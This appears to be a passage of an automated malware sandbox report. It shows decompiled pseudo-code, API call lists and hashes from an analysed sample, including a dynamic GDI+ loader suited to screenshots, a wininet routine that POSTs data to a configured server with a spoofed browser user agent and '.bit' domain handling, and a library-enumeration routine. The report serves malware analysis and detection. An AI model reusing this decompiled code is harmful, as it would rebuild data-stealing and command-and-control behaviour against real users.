4 API calls 22125->22126 22127 407adf 22126->22127 22128 403e1c 3 API calls 22127->22128 22130 407aef 22128->22130 22129 407b0b 22132 403b98 SysFreeString 22129->22132 22130->22129 22131 403798 21 API calls 22130->22131 22131->22129 22133 407b25 22132->22133 22134 4034e4 7 API calls 22133->22134 22135 407b2d 22134->22135 22135->18898 22137 403bbc 3 API calls 22136->22137 22138 4066cf 22137->22138 22316 406654 GetModuleHandleA GetProcAddress 22138->22316 22141 4066e4 22141->18902 22142 403bbc 3 API calls 22142->22141 22315->22123 22317 406676 GetCurrentProcess 22316->22317 22318 40667f 22316->22318 22317->22318 22318->22141 22318->22142 22353 404215 22352->22353 22354 40421c 22352->22354 22353->18999 22355 402614 7 API calls 22354->22355 22356 404223 22355->22356 22356->18999 22358 4041ea 22357->22358 22359 404224 9 API calls 22358->22359 22360 404203 22358->22360 22359->22358 22360->19006 22362 403372 GetStdHandle WriteFile GetStdHandle WriteFile 22361->22362 22363 4033c9 22361->22363 22362->18276 22365 4033d2 MessageBoxA 22363->22365 22366 4033e5 22363->22366 22365->22366 22366->18276 22367 417b1a 22368 417b29 20 API calls 22367->22368 22369 417c2d 22367->22369 22368->22369 22370 4016dc 22373 4016df 22370->22373 22371 4013ec LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 22371->22373 22372 401793 22375 40151c VirtualAlloc 22372->22375 22379 40173f 22372->22379 22373->22371 22373->22372 22374 401284 LocalAlloc 22373->22374 22376 401779 22373->22376 22378 40172e 22373->22378 22374->22373 22375->22379 22377 401464 VirtualFree 22376->22377 22377->22379 22380 401464 VirtualFree 22378->22380 22380->22379 22381 40955e 22382 409583 22381->22382 22383 409569 LoadLibraryA GetProcAddress 22381->22383 22383->22382

                                                                      Executed Functions

                                                                      Function 00417B1A Relevance: 57.8, APIs: 20, Strings: 13, Instructions: 64libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 100%
                                                                      			E00417B1A() {
				void* _t1;
				struct HINSTANCE__* _t2;
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t21;

				 *0x41c890 =  *0x41c890 - 1;
				if( *0x41c890 < 0) {
					_t2 = LoadLibraryA("crtdll.dll"); // executed
					 *0x41c868 = GetProcAddress(_t2, "wcscmp");
					_t4 = LoadLibraryA("Gdiplus.dll"); // executed
					 *0x41c86c = GetProcAddress(_t4, "GdiplusStartup");
					 *0x41c870 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdiplusShutdown");
					 *0x41c874 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipCreateBitmapFromHBITMAP");
					 *0x41c878 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncodersSize");
					 *0x41c87c = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncoders");
					 *0x41c880 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipDisposeImage");
					 *0x41c884 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipSaveImageToStream");
					 *0x41c888 = GetProcAddress(LoadLibraryA("ole32.dll"), "CreateStreamOnHGlobal");
					_t21 = GetProcAddress(LoadLibraryA("ole32.dll"), "GetHGlobalFromStream");
					 *0x41c88c = _t21;
					return _t21;
				}
				return _t1;
			}







                                                                      0x00417b1c
                                                                      0x00417b23
                                                                      0x00417b33
                                                                      0x00417b3e
                                                                      0x00417b4d
                                                                      0x00417b58
                                                                      0x00417b72
                                                                      0x00417b8c
                                                                      0x00417ba6
                                                                      0x00417bc0
                                                                      0x00417bda
                                                                      0x00417bf4
                                                                      0x00417c0e
                                                                      0x00417c23
                                                                      0x00417c28
                                                                      0x00000000
                                                                      0x00417c28
                                                                      0x00417c2d

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(crtdll.dll,wcscmp), ref: 00417B33
                                                                      • GetProcAddress.KERNEL32(00000000,crtdll.dll), ref: 00417B39
                                                                      • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B4D
                                                                      • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B53
                                                                      • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B67
                                                                      • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B6D
                                                                      • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B81
                                                                      • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B87
                                                                      • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B9B
                                                                      • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BA1
                                                                      • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll), ref: 00417BB5
                                                                      • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BBB
                                                                      • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll), ref: 00417BCF
                                                                      • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BD5
                                                                      • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll), ref: 00417BE9
                                                                      • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BEF
                                                                      • LoadLibraryA.KERNEL32(ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll), ref: 00417C03
                                                                      • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C09
                                                                      • LoadLibraryA.KERNEL32(ole32.dll,GetHGlobalFromStream,00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll), ref: 00417C1D
                                                                      • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C23
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: CreateStreamOnHGlobal$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$Gdiplus.dll$GdiplusShutdown$GdiplusStartup$GetHGlobalFromStream$crtdll.dll$ole32.dll$wcscmp
                                                                      • API String ID: 2574300362-2815069134
                                                                      • Opcode ID: 57a083585dbc8ce9df7a63cc0a821fb4195fa2904eec68678409c4ef2343df9d
                                                                      • Instruction ID: 8590a6e993e3993f4c60c6cfae4e59332f73d92cf5cac50a27a19d2551d8218b
                                                                      • Opcode Fuzzy Hash: 57a083585dbc8ce9df7a63cc0a821fb4195fa2904eec68678409c4ef2343df9d
                                                                      • Instruction Fuzzy Hash: 3911D0F17C430069DA0177B2DD8BAE635B4BBC1B4A730447B7104722D2E97C888196DD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00418688 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 375libraryloadernetworkCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 494 418688-41868c 495 418691-418696 494->495 495->495 496 418698-4186d8 call 403980 * 3 495->496 503 4186e7-41871d call 4034e4 call 40357c * 2 call 4039e8 GetModuleHandleA 496->503 504 4186da-4186e2 call 40357c 496->504 514 41872f-418731 503->514 515 41871f-41872d call 4039e8 LoadLibraryA 503->515 504->503 517 418733-41874d call 4039e8 * 2 LoadLibraryA 514->517 518 41874f-418934 call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 404f00 * 7 call 403790 call 403990 InternetCrackUrlA call 4036dc call 403790 call 4039f0 call 403a78 514->518 515->514 517->518 568 418977-41898b InternetOpenA 518->568 569 418936-418974 call 4036dc call 4037dc call 417f6c call 403990 518->569 570 418991-4189ce InternetConnectA 568->570 571 418adc-418ae3 568->571 569->568 585 4189d4-4189fb call 4036dc call 403a78 570->585 586 418ad6-418ad9 570->586 577 418ae5-418b23 call 4036dc * 2 call 418124 571->577 578 418b28-418b7f call 403538 call 4034e4 call 403508 * 4 571->578 577->578 603 418a04-418a2b call 403990 HttpOpenRequestA 585->603 604 4189fd 585->604 586->571 610 418a31-418a35 603->610 611 418ad0-418ad4 InternetCloseHandle 603->611 604->603 612 418a55-418a77 call 403790 call 403990 HttpSendRequestA 610->612 613 418a37-418a51 call 403790 call 403990 610->613 611->586 612->611 625 418a79-418aaf call 404f00 InternetReadFile call 4035d4 612->625 613->612 629 418ab4-418ac8 call 403798 625->629 629->611 632 418aca-418ace 629->632 632->611 632->625
                                                                      C-Code - Quality: 72%
                                                                      			E00418688(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				_Unknown_base(*)()* _v20;
				_Unknown_base(*)()* _v24;
				_Unknown_base(*)()* _v28;
				_Unknown_base(*)()* _v32;
				_Unknown_base(*)()* _v36;
				_Unknown_base(*)()* _v40;
				_Unknown_base(*)()* _v44;
				_Unknown_base(*)()* _v48;
				char _v52;
				char _v56;
				long _v60;
				void* _v64;
				void* _v68;
				int _v72;
				char _v73;
				signed int _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v132;
				char _v388;
				char _v516;
				char _v644;
				char _v2692;
				char _v3716;
				char _v3776;
				void _v69412;
				char _v69416;
				char _v69420;
				char _v69424;
				char _v69428;
				char _v69432;
				char _v69436;
				void* __ecx;
				long _t222;
				long _t283;
				void* _t297;
				struct HINSTANCE__* _t320;
				struct HINSTANCE__* _t324;
				void* _t325;
				intOrPtr _t327;
				intOrPtr _t350;
				void* _t357;
				struct _SYSTEMTIME _t368;
				intOrPtr* _t370;
				intOrPtr _t372;
				intOrPtr _t373;

				_t372 = _t373;
				_t327 = 0x21e6;
				do {
					_push(0);
					_push(0);
					_t327 = _t327 - 1;
				} while (_t327 != 0);
				_push(_t327);
				_t1 =  &_v8;
				 *_t1 = _t327;
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E00403980(_v8);
				E00403980(_v12);
				E00403980(_v16);
				_t368 =  &_v3776;
				_push(_t372);
				_push(0x418b80);
				_push( *[fs:eax]);
				 *[fs:eax] = _t373;
				if(_v16 == 0) {
					E0040357C( &_v16, 0x418b98);
				}
				E004034E4( &_v92);
				E0040357C( &_v56, _v8);
				_v73 = 0;
				E0040357C( &_v52, "wininet.dll");
				_t324 = GetModuleHandleA(E004039E8( &_v52));
				if(_t324 == 0) {
					_t320 = LoadLibraryA(E004039E8( &_v52)); // executed
					_t324 = _t320;
				}
				if(_t324 == 0) {
					(E004039E8( &_v52))[7] = 0;
					_t324 = LoadLibraryA(E004039E8( &_v52));
				}
				_v20 = GetProcAddress(_t324,  &((E004039E8( &_v52))[0xc]));
				_v24 = GetProcAddress(_t324,  &((E004039E8( &_v52))[0x1a]));
				_v28 = GetProcAddress(_t324,  &((E004039E8( &_v52))[0x2b]));
				_v32 = GetProcAddress(_t324,  &((E004039E8( &_v52))[0x3c]));
				_v36 = GetProcAddress(_t324,  &((E004039E8( &_v52))[0x53]));
				_v40 = GetProcAddress(_t324,  &((E004039E8( &_v52))[0x64]));
				_t370 = GetProcAddress(_t324,  &((E004039E8( &_v52))[0x75]));
				_v44 = GetProcAddress(_t324,  &((E004039E8( &_v52))[0x89]));
				_v48 = GetProcAddress(_t324,  &((E004039E8( &_v52))[0x9b]));
				E00404F00();
				E00404F00();
				E00404F00();
				E00404F00();
				E00404F00();
				E00404F00();
				E00404F00();
				 *_t368 = 0x3c;
				 *((intOrPtr*)(_t368 + 4)) =  &_v132;
				 *((intOrPtr*)(_t368 + 8)) = 0x20;
				 *(_t368 + 0x10) =  &_v388;
				 *((intOrPtr*)(_t368 + 0x14)) = 0x100;
				 *((intOrPtr*)(_t368 + 0x1c)) =  &_v516;
				 *((intOrPtr*)(_t368 + 0x20)) = 0x80;
				 *((intOrPtr*)(_t368 + 0x24)) =  &_v644;
				 *((intOrPtr*)(_t368 + 0x28)) = 0x80;
				 *(_t368 + 0x2c) =  &_v2692;
				 *((intOrPtr*)(_t368 + 0x30)) = 0x800;
				 *((intOrPtr*)(_t368 + 0x34)) =  &_v3716;
				 *((intOrPtr*)(_t368 + 0x38)) = 0x400;
				_t222 = E00403790(_v56);
				InternetCrackUrlA(E00403990(_v56), _t222, 0x90000000, _t368);
				E004036DC( &_v100,  *(_t368 + 0x10));
				E004039F0(_v100, 4, E00403790(_v100) - 3,  &_v69416);
				if(E00403A78(0x418c60, _v69416) != 0) {
					_v73 = 1;
					E004036DC( &_v69420,  *(_t368 + 0x10));
					E004037DC( &_v88, _v69420, "Host: ");
					E00417F6C(_v100, _t324,  &_v69424, _t368, _t370);
					 *(_t368 + 0x10) = E00403990(_v69424);
				}
				_t325 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", 0, 0, 0, 0);
				if(_t325 != 0) {
					_v84 = 0x2dc6c0;
					_v48(_t325, 6,  &_v84, 4);
					_v48(_t325, 5,  &_v84, 4);
					_v64 = InternetConnectA(_t325,  *(_t368 + 0x10),  *(_t368 + 0x18), 0, 0, 3, 0, 0);
					if(_v64 != 0) {
						_v80 = 0x84003300;
						E004036DC( &_v69428,  *((intOrPtr*)(_t368 + 4)));
						if(E00403A78(0x418cb4, _v69428) != 0) {
							_v80 = _v80 | 0x00800000;
						}
						_v68 = HttpOpenRequestA(_v64, E00403990(_v16),  *(_t368 + 0x2c), 0, 0, 0, _v80, 0);
						if(_v68 != 0) {
							if(_v73 != 0) {
								_v32(_v68, E00403990(_v88), E00403790(_v88), 0xa0000000);
							}
							_t283 = E00403790(_v12);
							if(HttpSendRequestA(_v68, E00418CB8, 0, E00403990(_v12), _t283) != 0) {
								do {
									E00404F00();
									_v72 = InternetReadFile(_v68,  &_v69412, 0x10064,  &_v60);
									E004035D4( &_v96, _v60,  &_v69412);
									_t297 = E00403798( &_v92, _v96);
									asm("sbb eax, eax");
								} while (_t297 + 1 != 0 && _v60 != 0);
							}
						}
						InternetCloseHandle(_v68); // executed
					}
					 *_t370(_v64);
				}
				 *_t370(_t325);
				if(_v92 == 0) {
					_push(_v100);
					_push(_v12);
					_push( *(_t368 + 0x18));
					_push( &_v92);
					E004036DC( &_v69432,  *(_t368 + 0x2c));
					_push(_v69432);
					E004036DC( &_v69436,  *(_t368 + 0x10));
					_pop(_t357);
					E00418124(_v69436, _t325, _v16, _t357, _t370);
				}
				E00403538(_a4, _v92);
				E004034E4( &_v92);
				_pop(_t350);
				 *[fs:eax] = _t350;
				_push(E00418B87);
				E00403508( &_v69436, 6);
				E00403508( &_v100, 4);
				E00403508( &_v56, 2);
				return E00403508( &_v16, 3);
			}























































                                                                      0x00418689
                                                                      0x0041868c
                                                                      0x00418691
                                                                      0x00418691
                                                                      0x00418693
                                                                      0x00418695
                                                                      0x00418695
                                                                      0x00418698
                                                                      0x00418699
                                                                      0x00418699
                                                                      0x0041869f
                                                                      0x004186a2
                                                                      0x004186a5
                                                                      0x004186ab
                                                                      0x004186b3
                                                                      0x004186bb
                                                                      0x004186c0
                                                                      0x004186c8
                                                                      0x004186c9
                                                                      0x004186ce
                                                                      0x004186d1
                                                                      0x004186d8
                                                                      0x004186e2
                                                                      0x004186e2
                                                                      0x004186ea
                                                                      0x004186f5
                                                                      0x004186fa
                                                                      0x00418706
                                                                      0x00418719
                                                                      0x0041871d
                                                                      0x00418728
                                                                      0x0041872d
                                                                      0x0041872d
                                                                      0x00418731
                                                                      0x0041873b
                                                                      0x0041874d
                                                                      0x0041874d
                                                                      0x00418761
                                                                      0x00418776
                                                                      0x0041878b
                                                                      0x004187a0
                                                                      0x004187b5
                                                                      0x004187ca
                                                                      0x004187df
                                                                      0x004187f5
                                                                      0x0041880c
                                                                      0x00418817
                                                                      0x00418827
                                                                      0x00418837
                                                                      0x00418847
                                                                      0x00418857
                                                                      0x00418867
                                                                      0x00418873
                                                                      0x00418878
                                                                      0x00418881
                                                                      0x00418884
                                                                      0x00418891
                                                                      0x00418894
                                                                      0x004188a1
                                                                      0x004188a4
                                                                      0x004188b1
                                                                      0x004188b4
                                                                      0x004188c1
                                                                      0x004188c4
                                                                      0x004188d1
                                                                      0x004188d4
                                                                      0x004188e4
                                                                      0x004188f3
                                                                      0x004188fc
                                                                      0x0041891d
                                                                      0x00418934
                                                                      0x00418936
                                                                      0x00418943
                                                                      0x00418956
                                                                      0x00418964
                                                                      0x00418974
                                                                      0x00418974
                                                                      0x00418987
                                                                      0x0041898b
                                                                      0x00418991
                                                                      0x004189a1
                                                                      0x004189ad
                                                                      0x004189c7
                                                                      0x004189ce
                                                                      0x004189d4
                                                                      0x004189e4
                                                                      0x004189fb
                                                                      0x004189fd
                                                                      0x004189fd
                                                                      0x00418a24
                                                                      0x00418a2b
                                                                      0x00418a35
                                                                      0x00418a52
                                                                      0x00418a52
                                                                      0x00418a58
                                                                      0x00418a77
                                                                      0x00418a79
                                                                      0x00418a84
                                                                      0x00418aa0
                                                                      0x00418aaf
                                                                      0x00418aba
                                                                      0x00418ac3
                                                                      0x00418ac6
                                                                      0x00418a79
                                                                      0x00418a77
                                                                      0x00418ad4
                                                                      0x00418ad4
                                                                      0x00418ada
                                                                      0x00418ada
                                                                      0x00418add
                                                                      0x00418ae3
                                                                      0x00418ae8
                                                                      0x00418aec
                                                                      0x00418af1
                                                                      0x00418af5
                                                                      0x00418aff
                                                                      0x00418b0a
                                                                      0x00418b14
                                                                      0x00418b22
                                                                      0x00418b23
                                                                      0x00418b23
                                                                      0x00418b2e
                                                                      0x00418b36
                                                                      0x00418b3d
                                                                      0x00418b40
                                                                      0x00418b43
                                                                      0x00418b53
                                                                      0x00418b60
                                                                      0x00418b6d
                                                                      0x00418b7f

                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418714
                                                                      • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418728
                                                                      • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418748
                                                                      • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 0041875C
                                                                      • GetProcAddress.KERNEL32(00000000,-0000001A), ref: 00418771
                                                                      • GetProcAddress.KERNEL32(00000000,-0000002B), ref: 00418786
                                                                      • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 0041879B
                                                                      • GetProcAddress.KERNEL32(00000000,-00000053), ref: 004187B0
                                                                      • GetProcAddress.KERNEL32(00000000,-00000064), ref: 004187C5
                                                                      • GetProcAddress.KERNEL32(00000000,-00000075), ref: 004187DA
                                                                      • GetProcAddress.KERNEL32(00000000,-00000089), ref: 004187F0
                                                                      • GetProcAddress.KERNEL32(00000000,-0000009B), ref: 00418807
                                                                      • InternetCrackUrlA.WININET(00000000,00000000,90000000,?,00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C), ref: 004188F3
                                                                      • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1),00000000,00000000,00000000,00000000,?,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C), ref: 00418984
                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 004189C4
                                                                      • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,84003300,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 00418A21
                                                                      • HttpSendRequestA.WININET(00000000,00418CB8,00000000,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418A72
                                                                      • InternetReadFile.WININET(00000000,?,00010064,?,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418A9D
                                                                      • InternetCloseHandle.WININET(00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418AD4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressProc$Internet$HandleHttpLibraryLoadOpenRequest$CloseConnectCrackFileModuleReadSend
                                                                      • String ID: .bit$Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$POST$wininet.dll
                                                                      • API String ID: 1919173369-2879170074
                                                                      • Opcode ID: 56a08f971a344ee113826defbb1e72536bdb7fe50e4f450330abf4f2e38adec9
                                                                      • Instruction ID: 76fb72323b8ae20ff65678eff3f65f90e6b3cd7dcd45201054b3a4b47af70050
                                                                      • Opcode Fuzzy Hash: 56a08f971a344ee113826defbb1e72536bdb7fe50e4f450330abf4f2e38adec9
                                                                      • Instruction Fuzzy Hash: 8AE1EAB1910219ABDB10EFA5CC86BDEBBBCBF44305F10417AF504B6681DB78AA458B58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040B15C Relevance: 9.2, APIs: 6, Instructions: 198libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 49%
                                                                      			E0040B15C(void* __ebx, void* __edi, void* __esi) {
				_Unknown_base(*)()* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v52;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				CHAR* _t72;
				struct HINSTANCE__* _t95;
				_Unknown_base(*)()* _t111;
				intOrPtr* _t157;
				struct HINSTANCE__* _t158;
				signed int _t159;
				void* _t160;
				intOrPtr _t170;
				intOrPtr _t175;
				intOrPtr _t179;
				intOrPtr* _t192;
				void* _t194;
				void* _t195;
				signed int _t200;
				intOrPtr _t202;
				intOrPtr _t203;

				_t202 = _t203;
				_t160 = 0xc;
				do {
					_push(0);
					_push(0);
					_t160 = _t160 - 1;
				} while (_t160 != 0);
				 *[fs:eax] = _t203;
				E00408120(0x9b,  &_v72);
				_t72 = E00403990(_v72);
				E00408120(0x9a,  &_v76);
				_t157 = GetProcAddress(LoadLibraryA(E00403990(_v76)), _t72);
				E0040813C(0x9c,  &_v80);
				 *_t157(E00403D3C(_v80),  &_v52,  *[fs:eax], 0x40b3c3, _t202, __edi, __esi, __ebx, _t160);
				E0040813C(0x9d,  &_v84);
				 *_t157(E00403D3C(_v84),  &_v68);
				E00408120(0x9e,  &_v88);
				_t95 = LoadLibraryA(E00403990(_v88)); // executed
				_t158 = _t95;
				if(_t158 != 0) {
					E00408120(0x9f,  &_v92);
					_t111 = GetProcAddress(_t158, E00403990(_v92));
					E00408120(0xa0,  &_v96);
					_t192 = GetProcAddress(_t158, E00403990(_v96));
					E00408120(0xa1,  &_v100);
					_v8 = GetProcAddress(_t158, E00403990(_v100));
					_v12 = 0;
					_push( &_v16);
					_push(0);
					_push( &_v52);
					if( *_t111() == 0) {
						_push( &_v20);
						_push( &_v12);
						_push(0x200);
						_push(_v16);
						if( *_t192() == 0) {
							_t194 = _v12 - 1;
							if(_t194 >= 0) {
								_t195 = _t194 + 1;
								_t159 = 0;
								do {
									_t179 =  *0x40b130; // 0x40b134
									E004047B4( &_v24, _t179);
									_push( &_v24);
									_push(0);
									_push(0);
									_push(0);
									_t200 = (_t159 << 3) - _t159;
									_push( *((intOrPtr*)(_v20 + 0x18 + _t200 * 8)));
									_push( *((intOrPtr*)(_v20 + 0x14 + _t200 * 8)));
									_push( &_v68);
									_push(_v16);
									if(_v8() == 0) {
										E0040370C( &_v28,  *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x14 + _t200 * 8)) + 0x10)));
										E0040370C( &_v32,  *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x18 + _t200 * 8)) + 0x10)));
										E0040370C( &_v36,  *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x1c)) + 0x10)));
										if(E00403790(_v28) != 0 && E00403790(_v36) != 0) {
											E00408120(0xa2,  &_v104);
											E00405210(0x40b3e8, _t159, _v28, _v104, _t195, _t200, 0x40b3dc, _v36, _v32);
										}
									}
									_t159 = _t159 + 1;
									_t195 = _t195 - 1;
								} while (_t195 != 0);
							}
						}
					}
				}
				_pop(_t170);
				 *[fs:eax] = _t170;
				_push(E0040B3CA);
				E00403508( &_v104, 5);
				E00403B98( &_v84, 2);
				E00403508( &_v76, 2);
				E00403508( &_v36, 3);
				_t175 =  *0x40b130; // 0x40b134
				return E00404224( &_v24, 2, _t175);
			}






































                                                                      0x0040b15d
                                                                      0x0040b15f
                                                                      0x0040b164
                                                                      0x0040b164
                                                                      0x0040b166
                                                                      0x0040b168
                                                                      0x0040b168
                                                                      0x0040b17a
                                                                      0x0040b185
                                                                      0x0040b18d
                                                                      0x0040b19b
                                                                      0x0040b1b4
                                                                      0x0040b1c2
                                                                      0x0040b1d0
                                                                      0x0040b1de
                                                                      0x0040b1ec
                                                                      0x0040b1f6
                                                                      0x0040b204
                                                                      0x0040b209
                                                                      0x0040b20d
                                                                      0x0040b21b
                                                                      0x0040b22a
                                                                      0x0040b239
                                                                      0x0040b24d
                                                                      0x0040b257
                                                                      0x0040b26b
                                                                      0x0040b270
                                                                      0x0040b276
                                                                      0x0040b277
                                                                      0x0040b27c
                                                                      0x0040b281
                                                                      0x0040b28a
                                                                      0x0040b28e
                                                                      0x0040b28f
                                                                      0x0040b297
                                                                      0x0040b29c
                                                                      0x0040b2a5
                                                                      0x0040b2a8
                                                                      0x0040b2ae
                                                                      0x0040b2af
                                                                      0x0040b2b1
                                                                      0x0040b2b4
                                                                      0x0040b2ba
                                                                      0x0040b2c2
                                                                      0x0040b2c3
                                                                      0x0040b2c5
                                                                      0x0040b2c7
                                                                      0x0040b2ce
                                                                      0x0040b2d7
                                                                      0x0040b2df
                                                                      0x0040b2e3
                                                                      0x0040b2e7
                                                                      0x0040b2ed
                                                                      0x0040b2fc
                                                                      0x0040b30e
                                                                      0x0040b31f
                                                                      0x0040b32e
                                                                      0x0040b351
                                                                      0x0040b361
                                                                      0x0040b361
                                                                      0x0040b32e
                                                                      0x0040b366
                                                                      0x0040b367
                                                                      0x0040b367
                                                                      0x0040b2b1
                                                                      0x0040b2a8
                                                                      0x0040b29c
                                                                      0x0040b281
                                                                      0x0040b370
                                                                      0x0040b373
                                                                      0x0040b376
                                                                      0x0040b383
                                                                      0x0040b390
                                                                      0x0040b39d
                                                                      0x0040b3aa
                                                                      0x0040b3b2
                                                                      0x0040b3c2

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(00000000,00000000,00000000,0040B3C3,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F), ref: 0040B1A9
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B1AF
                                                                      • LoadLibraryA.KERNEL32(00000000,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F,?,00000000,0041B0FC,00000000), ref: 0040B204
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B22A
